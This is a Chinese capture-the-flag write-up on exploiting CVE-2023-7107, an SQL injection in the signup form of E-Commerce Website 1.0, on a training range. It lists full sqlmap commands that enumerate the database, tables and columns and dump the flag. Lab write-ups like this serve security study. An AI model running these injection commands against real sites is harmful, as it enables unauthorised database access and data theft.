春秋云境靶场之CVE-2023-7107

靶标介绍

E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

攻克过程

1、打开靶机发现是这样的页面

 2、根据靶标介绍中的几个关键字段,很显然,我们需要点击sign up进入注册页面

3、 随便填入信息后,使用burpsuite进行抓包,并将数据包内容保存为test.txt

4、接下来,我们就需要请出我们的老朋友sqlmap,但是因为这里有cookie和user-agent,所以我们在sqlmap中也需要设置,为了sqlmap能通过身份验证和客户端验证。 先爆出数据库名称

sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -dbs

5、接着爆出表的名称

sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -tables

 

6、爆出字段名称

sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -T flllaaaag -columns

 

7、最后爆出flag

sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -T flllaaaag -C flag -dump

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值